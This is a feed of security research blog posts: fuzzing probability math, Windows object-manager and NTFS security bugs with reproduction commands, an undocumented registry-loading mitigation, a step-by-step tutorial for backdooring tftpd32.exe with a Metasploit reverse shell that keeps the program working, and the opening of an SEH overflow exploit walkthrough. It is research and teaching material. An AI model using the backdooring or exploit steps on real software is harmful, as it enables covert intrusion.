Disclaimer: Here is where some math comes in, and I’m not guaranteeing this math is correct. I even sought help from some really smart people like @Firzen14 and am still not 100% confident in my math lol. But! I did go ahead and simulate the systems involved here hundreds of millions of times and the results of the empirical data were super close to what the possibly broken math said it should be. So, if it’s not correct, it’s at least close enough to prove the points I’m trying to demonstrate.

Let’s try and figure out how likely it is that we pass the first check and get a crash. The first obstacle we need to pass is that we need index 2626 to be chosen for mutation. If it’s not mutated, we know that by default it’s not going to hold the value we need it to hold and we won’t pass the check. Since we’re selecting a byte to be mutated 159 times, and we have 7958 bytes to choose from, the odds of us mutating the byte at index 2626 is probably something close to 159/7958 which is 0.0199798944458407.

The second obstacle is that we need it to hold exactly \x6c, and the fuzzer has 255 byte values to choose from. So the chances of this byte, once selected for mutation, being mutated to exactly \x6c is 1/255, which is 0.003921568627451. (Strictly speaking, rand() % 256 can produce 256 different values, so 1/256 is slightly more exact, but the difference is negligible here.)

So the chances of both of these things occurring should be close to 0.0199798944458407 * 0.003921568627451, (about .0078%), which if you multiply by 1 million, would have you at around 78 crashes. We were pretty close to that with 88. Given that we’re doing this randomly, there is going to be some variance.
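
Here is the same estimate in Python, next to a slightly refined version. The refinement is my own assumption, not the math above: it uses the probability that index 2626 is picked at least once in 159 draws with replacement, and 1/256 for the byte value since rand() % 256 has 256 outcomes.

```python
FILE_SIZE = 7958
MUTATIONS = 159
ITERATIONS = 1_000_000

# Estimate used in the text.
p_index_approx = MUTATIONS / FILE_SIZE
expected_text = p_index_approx * (1 / 255) * ITERATIONS

# Refined estimate: index chosen at least once, value uniform over 256 bytes.
p_index_exact = 1 - (1 - 1 / FILE_SIZE) ** MUTATIONS
expected_refined = p_index_exact * (1 / 256) * ITERATIONS

print(round(expected_text, 1), round(expected_refined, 1))
```

Both land within about one crash of each other, so either way the observed 88 is in the right ballpark.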

So in conclusion for Experiment 1, we were able to reliably pass this one type of check and reach our vulnerable function with our dumb fuzzer. Let’s see how things change when we add a second check.

Experiment 2: Passing Two Checks

Here is where the math becomes an even bigger problem; however, as I said previously, I ran a simulation of the events hundreds of millions of times and was pretty close to what I thought should be the math.

Having the byte value be correct is fairly straightforward I think and is always going to be 1/255, but having both indexes selected for mutation with only 159 choices available tripped me up. I ran a simulator to see how often it occurred that both indexes were selected for mutation and let it run for a while, after over 390 million iterations, it happened around 155,000 times total.

<snip>
Occurences: 155070    Iterations: 397356879
Occurences: 155080    Iterations: 397395052
Occurences: 155090    Iterations: 397422769
<snip>

155090/397422769 == .0003902393423261565. I would think the math is something close to (159/7958) * (158/7958), which would end up being .0003966855142551934. So you can see that they’re pretty close, given some random variance, they’re not too far off. This should be close enough to demonstrate the problem.
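
One possible way to pin this number down without a simulation is inclusion-exclusion. Assuming 159 independent uniform draws over 7958 indexes, the chance that both target indexes get picked at least once is 1 - 2(1 - 1/N)^k + (1 - 2/N)^k. This is my own derivation, so treat it as a sketch:

```python
def p_both_selected(file_size, draws):
    """P(two specific indexes are each chosen at least once in `draws` picks)."""
    miss_one = (1 - 1 / file_size) ** draws    # a given index is never picked
    miss_both = (1 - 2 / file_size) ** draws   # neither index is ever picked
    return 1 - 2 * miss_one + miss_both

closed_form = p_both_selected(7958, 159)
approximation = (159 / 7958) * (158 / 7958)    # the estimate from the text
simulated = 155090 / 397422769                 # the simulation result above

print(closed_form, approximation, simulated)
```

The closed form comes out a little below the (159/7958) * (158/7958) estimate and very close to the simulated value, which would explain the small gap between the two.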

Now that we have to pass two checks, we can mathematically summarize the odds of this happening with our dumb fuzzer as follows:

((159/7958) * (1/255)) == odds to pass first check
odds to pass first check * (158/7958) == odds to pass first check and have second index targeted for mutation
odds to pass first check * ((158/7958) * (1/255)) == odds to have second index targeted for mutation and hold the correct value
((159/7958) * (1/255)) * ((158/7958) * (1/255)) == odds to pass both checks
((0.0199798944458407 * 0.003921568627451) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9

So the odds of us getting both indexes selected for mutation and having both indexes mutated to hold the needed value is around .000000006100507716342904, which is .0000006100507716342904%.

For one check enabled, we should’ve expected ONE crash every ~12,820 iterations.

For two checks enabled, we should expect ONE crash every ~163 million iterations.

This is quite the problem. Our fuzzer would need to run for a very long time to reach that many iterations on average. As written and performing in a VM, the fuzzer does roughly 1,600 iterations a second. It would take me about 28 hours to reach 163 million iterations. You can see how our chances of finding the bug decreased exponentially with just one more check enabled. Imagine a third check being added!
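
The iteration counts and the runtime follow directly from the odds above. A small Python sketch using the same formulas and the 1,600 iterations per second figure:

```python
p_one_check = (159 / 7958) * (1 / 255)
p_two_checks = p_one_check * (158 / 7958) * (1 / 255)

iterations_one = 1 / p_one_check      # average iterations per crash, one check
iterations_two = 1 / p_two_checks     # average iterations per crash, two checks

ITERATIONS_PER_SECOND = 1600
hours_two = iterations_two / ITERATIONS_PER_SECOND / 3600

print(round(iterations_one), round(iterations_two), round(hours_two, 1))
```

Without rounding the probability to .0078% first, the one-check figure comes out nearer 12,760 than 12,820, which does not change the picture.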

How Code Coverage Tracking Can Help Us

If our fuzzer was able to track code coverage, we could turn this problem into something much more manageable.

Generically, a code coverage tracking system in our fuzzer would keep track of what inputs reached new code in the application. There are many ways to do this. Sometimes when source code is available to you, you can recompile the binaries with instrumentation added that informs the fuzzer when new code is reached, there is emulation, etc. @gamozolabs has a really cool Windows userland code coverage system that leverages an extremely fast debugger that sets millions of breakpoints in a target binary and slowly removes breakpoints as they are reached called ‘mesos’. Once your fuzzer becomes aware that a mutated input reached new code, it would save that input off so that it can be re-used and mutated further to reach even more code. That is a very simple explanation, but hopefully it paints a clear picture.

I haven’t yet implemented a code coverage technique for the fuzzer, but we can easily simulate one. Let’s say our fuzzer was able, 1 out of ~13,000 times, to pass the first check and reach that second check in the program.

The first time the input reached this second check, it would be considered new code coverage. As a result, our now smart fuzzer would save that input off as it caused new code to be reached. This input would then be fed back through the mutator and hopefully reach the same new code again with the added possibility of reaching even more code.
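
To make the save-and-remutate loop concrete, here is a toy Python simulation. Everything in it is hypothetical: a 64-byte input, three magic-byte checks standing in for check_one/check_two/check_three, and "coverage" reduced to how many checks an input passes. Real coverage tracking is far more involved.

```python
import random

# Hypothetical toy target: (index, required byte) pairs checked in order.
CHECKS = [(21, 0x6C), (32, 0x57), (42, 0x21)]

def depth_reached(data):
    """Toy coverage signal: how many consecutive checks the input passes."""
    depth = 0
    for index, value in CHECKS:
        if data[index] != value:
            break
        depth += 1
    return depth

def mutate(data, count, rng):
    """Overwrite `count` randomly chosen bytes with random values."""
    out = bytearray(data)
    for _ in range(count):
        out[rng.randrange(len(out))] = rng.randrange(256)
    return bytes(out)

def guided_fuzz(seed_input, max_iterations, rng):
    """Return the iteration at which all checks pass, or None if never."""
    base = seed_input
    base_depth = depth_reached(base)
    for iteration in range(1, max_iterations + 1):
        candidate = mutate(base, 2, rng)
        depth = depth_reached(candidate)
        if depth > base_depth:
            # New "coverage": keep this input as the base for future mutations.
            base, base_depth = candidate, depth
        if base_depth == len(CHECKS):
            return iteration
    return None

print(guided_fuzz(bytes(64), 2_000_000, random.Random(1)))
```

Because each saved input already passes the earlier checks, every stage is only a one-check problem, so the total work grows roughly with the number of checks instead of multiplying.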

Let’s demonstrate this. Let’s doctor our file Canon_40D.jpg such that the byte at the 2626 index is \x6c, and feed it through to our vulnerable application.

h0mbre@pwn:~/fuzzing$ vuln Canon_altered.jpg 
[>] Analyzing file: Canon_altered.jpg.
[>] Canon_altered.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 2 failed.

As you can see, we passed the first check and failed on the second check. Let’s use this Canon_altered.jpg file now as our base input for mutation, simulating the fact that we have code coverage tracking in our fuzzer, and see how many crashes we get when we are only testing two checks total.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_altered.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 86
[>] Fuzzing completed, exiting...

So by using the file that got us increased code coverage, ie it passed the first check, as a base file and sending it back through the mutator, we were able to pass the second check 86 times. We essentially took that exponentially hard problem we had earlier and turned it back into our original problem of only needing to pass one check. There are a bunch of other considerations that real fuzzers would have to take into account but I’m just trying to plainly demonstrate how it helps reduce the exponential problem into a more manageable one.

We reduced our ((0.0199798944458407 * 0.003921568627451) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9 problem to something closer to (0.0199798944458407 * 0.003921568627451), which is a huge win for us.

Some nuance here is that feeding the altered file back through the mutation process could do a few things. It could remutate the byte at index 2626 and then we wouldn’t even pass the first check. It could mutate the file so much (remember, it is already up to 2% different than a valid jpeg from the first round of mutation) that the vulnerable application flat out rejects the input and we waste fuzz cycles.

So there are a lot of other things to consider, but hopefully this plainly demonstrates how code-coverage helps fuzzers complete a more comprehensive test of a target binary.

Conclusion

There are a lot of resources out there on different code coverage techniques, so definitely follow up and read more on the subject if it interests you. @carste1n has a great series where he incrementally improves a fuzzer; you can catch the latest article here: https://carstein.github.io/2020/05/21/writing-simple-fuzzer-4.html

At some time in the future we can add some code coverage logic to our dumb fuzzer from this article and we can use the vulnerable program as a sort of benchmark to judge the effectiveness of a code coverage technique.

One interesting note: I fuzzed the vulnerable application with all three checks enabled with AFL for about 13 hours and wasn’t able to crash it! I’m not sure why it was so difficult. With only two checks enabled, AFL was able to find the crash very quickly. Maybe there was something wrong with my testing, I’m not quite sure.

Until next time!

OBJ_DONT_REPARSE is (mostly) Useless.

Tyranid's Lair

By: tiraniddo

23 May 2020 at 10:21

Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well that's not what you might expect, there should be no reparse points to access notepad, so what went wrong? Well, you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still, this does mean that it will also work to protect you from Registry Symbolic Links, as they also use a Reparse Point.
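As a rough mental model of the behavior just described, here is a toy Python sketch. It is not how the Object Manager is implemented: the `SYMLINKS` table, the `resolve` function and the `HarddiskVolume3` target are illustrative assumptions, and only the status value is taken from the error output above.

```python
STATUS_REPARSE_POINT_ENCOUNTERED = 0xC000050B  # value shown in the error above

# Toy namespace: an Object Manager symbolic link maps one name prefix to another.
# The target volume name is an assumption for illustration.
SYMLINKS = {r"\??\C:": r"\Device\HarddiskVolume3"}


class NtStatusError(Exception):
    def __init__(self, status):
        super().__init__(f"NTSTATUS 0x{status:08X}")
        self.status = status


def resolve(path, dont_reparse=False):
    """Resolve a path, failing on any symbolic link if dont_reparse is set."""
    for link, target in SYMLINKS.items():
        if path.upper().startswith(link.upper()):
            if dont_reparse:
                # The drive letter itself counts as a reparse, so we stop here.
                raise NtStatusError(STATUS_REPARSE_POINT_ENCOUNTERED)
            return target + path[len(link):]
    return path  # no symbolic link was involved


print(resolve(r"\??\c:\windows\notepad.exe"))
try:
    resolve(r"\??\c:\windows\notepad.exe", dont_reparse=True)
except NtStatusError as err:
    print("failed:", err)
```

In this model a path that already starts at the device name resolves fine with the flag set, because no symbolic link is crossed.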

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK which does what you'd want to avoid file system symbolic links but that can only be accessed in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath
\Device\HarddiskVolume3\Windows\notepad.exe

Oh well...

Silent Exploit Mitigations for the 1%

Tyranid's Lair

By: tiraniddo

22 May 2020 at 23:59

With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problem with many of these mitigations is they're regularly undocumented or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

One example of these silent mitigations is the pair of additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time: originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael's fault). And now finally NtLoadKey3. I've no idea why it went to 2 then to Ex then back to 3, maybe it's some new Microsoft counting system. NtLoadKeyEx is partially exposed through the Win32 APIs RegLoadKey and RegLoadAppKey, although they only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather than a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the log files to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°）╯︵ ┻━┻).

NtLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made best guess with the following:

Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure if they ever needed to extend the system call whether to go for NtLoadKey4 or NtLoadKeyExEx so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

Distrusting the patch: a run through my first LPE 0-day, from command injection to path traversal

Matteo Malvica

21 May 2020 at 00:00

Intro - TL;DR On April 29th, exploit-db published a Local Privilege Escalation (LPE) exploit for Druva InSync. Druva had by then implemented a patch on their latest InSync release, fixing the bug. However, the patch introduced an additional bug, paving the way for further exploitation and making it possible for a local low-privileged user to obtain SYSTEM level privileges. A team from Tenable Research and I concurrently discovered this new vulnerability, resulting in a new CVE (CVE-2020-5752) and exploit being published.

Writing Windows File System Drivers is Hard.

Tyranid's Lair

By: tiraniddo

20 May 2020 at 21:29

A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edge cases pop up over time.

The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine, you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, if you don't specify a flag then a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verify this behavior on the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs: one for the INTERACTIVE group, which will inherit on a Directory, and one for NETWORK, which will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ
ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
Volume in drive C has no label.
Volume Serial Number is 9A7B-865C

Directory of C:\ABC

2020-05-20 19:09 <DIR> .
2020-05-20 19:09 <DIR> ..
2020-05-20 19:05 <DIR> XYZ
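The mix-up demonstrated above can be modelled in a few lines of Python. This is a deliberately simplified sketch and not NTFS's actual code: `ntfs_create`, `effective_inherited` and the ACE table are hypothetical names, and the model only tracks which ACEs become effective on the new object (it ignores inherit-only propagation and the SYSTEM/Administrators entries seen in the icacls output).

```python
CI = "CI"  # CONTAINER_INHERIT_ACE: inherited by child directories
OI = "OI"  # OBJECT_INHERIT_ACE: inherited by child files

# The two ACEs granted on ABC in the walkthrough above.
PARENT_ACES = [("INTERACTIVE", {CI}), ("NETWORK", {OI})]


def effective_inherited(parent_aces, treat_as_directory):
    """Return the trustees whose ACEs apply to the new child object."""
    wanted = CI if treat_as_directory else OI
    return [name for name, flags in parent_aces if wanted in flags]


def ntfs_create(name, directory_file_flag):
    """Toy model of the create path described in the post."""
    # What actually gets created: the stream type forces a directory.
    really_directory = (
        directory_file_flag or name.upper().endswith("::$INDEX_ALLOCATION")
    )
    # The bug: inheritance is decided from the create option flag alone.
    is_directory_object = directory_file_flag
    return really_directory, effective_inherited(PARENT_ACES, is_directory_object)


print(ntfs_create("XYZ", directory_file_flag=True))
print(ntfs_create("XYZ::$INDEX_ALLOCATION", directory_file_flag=False))
```

The second call yields a directory that carries the NETWORK ACE, matching the icacls output.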

Is this useful? Honestly probably not. The only scenario I could imagine it would be is if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified when determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why this design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.

APC Series: User APC API

Low Level Pleasure

17 May 2020 at 00:00

Hey! Long time no see. Coronavirus makes it harder for me to write posts, I hope I’ll have the time to write - I have a lot I want to share! One of the things I did in the last few weeks is to explore the APC mechanism in Windows and I wanted to share some of my findings. The purpose of this series is to allow you to get a systematic understanding of APC internals.

Portable Executable (PE) backdooring and Address Space Layout Randomization (ASLR)

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

15 May 2020 at 17:59

This blog will go over how to backdoor a Windows executable. The intent is to show how a Windows PE can be hijacked to introduce a reverse shell while still allowing the executable to maintain its functionality. We will also go over how ASLR, a security feature that randomises the base address of executables/DLLs and the positions of other memory segments like the stack and heap, affects the process. ASLR prevents exploits from reliably jumping to a certain function/piece of code.

This is why you shouldn't trust any executables that you are introducing to your system without verifying its source or checksum.

References:

Portable Executable (PE): https://en.wikipedia.org/wiki/Portable_Executable

Address Space Layout Randomization (ASLR): https://en.wikipedia.org/wiki/Address_space_layout_randomization

Executables:

tftpd32.exe - a free, open-source TFTP server that also includes a variety of other services, including DHCP, DNS, and even syslog, and functions as a TFTP client as well

PsExec.exe - a command-line tool that lets you execute processes on remote systems and redirect console applications' output to the local system so that these applications appear to be running locally.

Tools:

Immunity Debugger (http://debugger.immunityinc.com/ID_register.py)

LordPE (http://www.malware-analyzer.com/pe-tools)

XVI32 (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm)

~//*******//~

0x0 - Adding a New Section...Code Cave

There are basically two (or more?) ways to get a code cave: (1) find available address space or (2) add a new executable section.

"The concept of a code cave is often employed by hackers and reverse engineers to execute arbitrary code in a compiled program. It can be a helpful method to make modifications to a compiled program in the example of including additional dialog boxes, variable modifications or even the removal of software key validation checks. Often using a call instruction commonly found on many CPU architectures, the code jumps to the new subroutine and pushes the next address onto the stack. After execution of the subroutine a return instruction can be used to pop the previous location off of the stack into the program counter. This allows the existing program to jump to the newly added code without making significant changes to the program flow itself."

(1) Finding a code cave using backdoor-factory

(2) Using LordPE to add a new executable section.

For this blog, we will add a new section. As seen above, I added a section with a virtual size of 1000 and a raw size of 400. Also note that the virtual offset is 0004B000, as we will need this value to calculate the Relative Virtual Address (RVA). Since ASLR is enabled, we will use RVAs in order to dynamically do our jumps and address redirections.

0x1 - Entry point and New Section address

Using Immunity Debugger, we get the address of the new section (from here on, this will be called the code cave).

We can see that the address is currently pointing to 010AB000; however, the 2 higher bytes of the address are irrelevant due to ASLR.

We can see the entry point once we open up tftpd32.exe in Immunity Debugger and verify the memory map. We will be hijacking the first instruction to make the jump to our code cave. Also, note that we will need to reintroduce these two instructions after the backdoor.

If ASLR was not enabled, we could have easily done a jmp 010AB000. That said, we will need to do some calculations to always hit the code cave regardless of whether its address is randomized.

To calculate the RVA, we will need the virtual offset and the entry point.

4B000 (VOffset) - 1208C (EntryPoint) = 38F74. This means that we will do a jmp 38F74.

Using nasm_shell.rb, we generate the following opcodes.

Our first instruction will be updated with E9 6F8F0300 which will do a jump to our code cave.
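For anyone without nasm_shell.rb at hand, the same opcode bytes can be derived by hand. The sketch below assumes the 5-byte `E9 rel32` form of JMP, where the displacement is measured from the end of the instruction, which is why the encoded value is 38F6F rather than the raw 38F74 difference. The helper name `jmp_rel32` is my own.

```python
import struct


def jmp_rel32(src_rva, dst_rva):
    """Encode a near JMP (E9 rel32) located at src_rva that lands on dst_rva."""
    # The displacement is relative to the address of the next instruction,
    # and this form of JMP is 5 bytes long.
    rel = dst_rva - (src_rva + 5)
    return b"\xE9" + struct.pack("<i", rel)


ENTRY_POINT_RVA = 0x1208C  # entry point from the walkthrough
CODE_CAVE_RVA = 0x4B000    # virtual offset of the new section

patch = jmp_rel32(ENTRY_POINT_RVA, CODE_CAVE_RVA)
print(patch.hex(" ").upper())
```

Because only the distance between the two locations is encoded, the bytes stay valid no matter where ASLR places the image.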

...if we reload the program, ASLR kicks in, as we can see the higher 2 bytes have changed. Same opcodes, different address.

We take the jump and it lands us at the beginning of our code cave.

0x2 - Backdoor/Reverse Shell Code

Once in our code cave, we will add a Metasploit reverse shellcode

We will create the payload in hex format and binary copy it to the program using immunity debugger.

Before the reverse shell can be copied, all the registers and flags have to be saved, which can be done with the PUSHAD and PUSHFD instructions. This is needed to maintain the integrity of the original program execution.

Once reverse shellcode is added, registers and flags are restored to their original state using POPFD and POPAD. However before that, we need to adjust the value of ESP to point it to the original stack/ESP value.

In my case, here are the ESP values

Before shellcode: 0025F908

After shellcode: 0025F70C

We will need to add 1FC to the ESP to align it, then execute the POPFD and POPAD instructions to restore the registers and flags
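The adjustment is just the difference between the two ESP values. As a small sketch, the snippet below computes it and lays out the restore sequence as bytes. The opcode bytes are the standard x86 encodings for `ADD ESP, imm32`, `POPFD` and `POPAD`; packaging them into one `restore_stub` is my own illustration, and the ESP values will differ on another run or payload.

```python
import struct

ESP_BEFORE_SHELLCODE = 0x0025F908  # values observed in the walkthrough
ESP_AFTER_SHELLCODE = 0x0025F70C

# How far the shellcode moved ESP; this is what must be added back.
esp_delta = ESP_BEFORE_SHELLCODE - ESP_AFTER_SHELLCODE

restore_stub = (
    b"\x81\xC4" + struct.pack("<I", esp_delta)  # ADD ESP, esp_delta
    + b"\x9D"                                   # POPFD (flags were pushed last)
    + b"\x61"                                   # POPAD
)

print(hex(esp_delta))
print(restore_stub.hex(" ").upper())
```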

At this point, if we add a breakpoint at the end of our shellcode and run the program...we should get a reverse shell to our Kali netcat listener.

As you can see, we have successfully hijacked code execution and redirected it to our code cave containing our reverse shellcode.

0x3 - Restoring Original Program Instructions

Remember the two instructions at the entry point before they were hijacked? We will now need to restore these two instructions so the program can run as intended.

Keep in mind that we are still dealing with ASLR, which means we will need to calculate the RVA once again.

0096 BF15 - 0095 0000 = RVA 1 BF15 (this will be our CALL RVA_1 BF15) (additional offset by 10000)

0096 2091 - 0095 0000 = RVA 1 2091 (this will be our JMP RVA_1 2091) (additional offset by 10000)

At address 010AB169 or RVA 4B169 (virtual offset + 169)

RVA_4B169 - RVA_1 BF15

At address 010AB16E or RVA 4B16E (virtual offset + 16E)

RVA_4B16E- RVA_1 2091
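Here is how those two calculations could be scripted. This is a sketch under a few assumptions: 00950000 is taken to be the image base of that debugging session, and both restored instructions are assumed to use the 5-byte rel32 forms (`E8` for CALL, `E9` for JMP). Since both targets sit before the code cave, the displacements come out negative.

```python
import struct


def rel32(opcode, src_rva, dst_rva):
    """Encode a 5-byte CALL (0xE8) or JMP (0xE9) with a rel32 displacement."""
    return bytes([opcode]) + struct.pack("<i", dst_rva - (src_rva + 5))


IMAGE_BASE = 0x00950000  # assumed load address for this run

call_target_rva = 0x0096BF15 - IMAGE_BASE  # original CALL destination
jmp_target_rva = 0x00962091 - IMAGE_BASE   # instruction after the hijacked JMP

call_patch = rel32(0xE8, 0x4B169, call_target_rva)  # placed at cave + 169
jmp_patch = rel32(0xE9, 0x4B16E, jmp_target_rva)    # placed at cave + 16E

print(hex(call_target_rva), call_patch.hex(" ").upper())
print(hex(jmp_target_rva), jmp_patch.hex(" ").upper())
```

Note that the JMP target, 12091, is exactly the entry point 1208C plus the 5 bytes overwritten by the hijacking jump.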

Add these instructions or opcodes as shown below:

And we are done...somewhat.

0x4 - WaitForSingleObject

Our reverse shell calls the WaitForSingleObject function, passing an ESI value of -1 as the timeout. As a result, tftpd32.exe will not run until we exit the reverse shell. This means that we will need to change the ESI value from -1 to 0.

We will trace code execution in Immunity Debugger using the 'Trace Over' command.

Line 5 has a DEC ESI instruction which makes ESI = FFFFFFFF. This means that all we need to do is cancel the DEC ESI instruction (replacing it with a NOP works just fine)!

We should now be able to successfully execute the program while it also simultaneously sends a reverse shell to Kali.

Thanks for reading.

freeFTPd-1.0.10 SEH Based Buffer Overflow

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

13 May 2020 at 10:40

Kali Linux

Windows Vista

freeFTPD 1.0.10

Original Author, POC, and vulnerable software: https://www.exploit-db.com/exploits/27747

GitHub:https://github.com/pyt3ra/freeFTPd-1.0.10-SEH-Based-Buffer-Overflow

~~~~~~//******//~~~~~~

Vulnerable program:

Initial Proof-of-Concept

...and we get our initial crash where our SEH handler and nSEH have been overwritten with 41s.

Calculating the offset values

As usual, we use Metasploit's pattern_create.rb and pattern_offset.rb

We update our POC with the following offset values

...and we verify that we hit the correct offset values as shown with the Cs and Bs

POP-POP-RET

Since this is an SEH based buffer overflow, as usual we will need a POP-POP-RET address.

I am using mona.py to find this address.

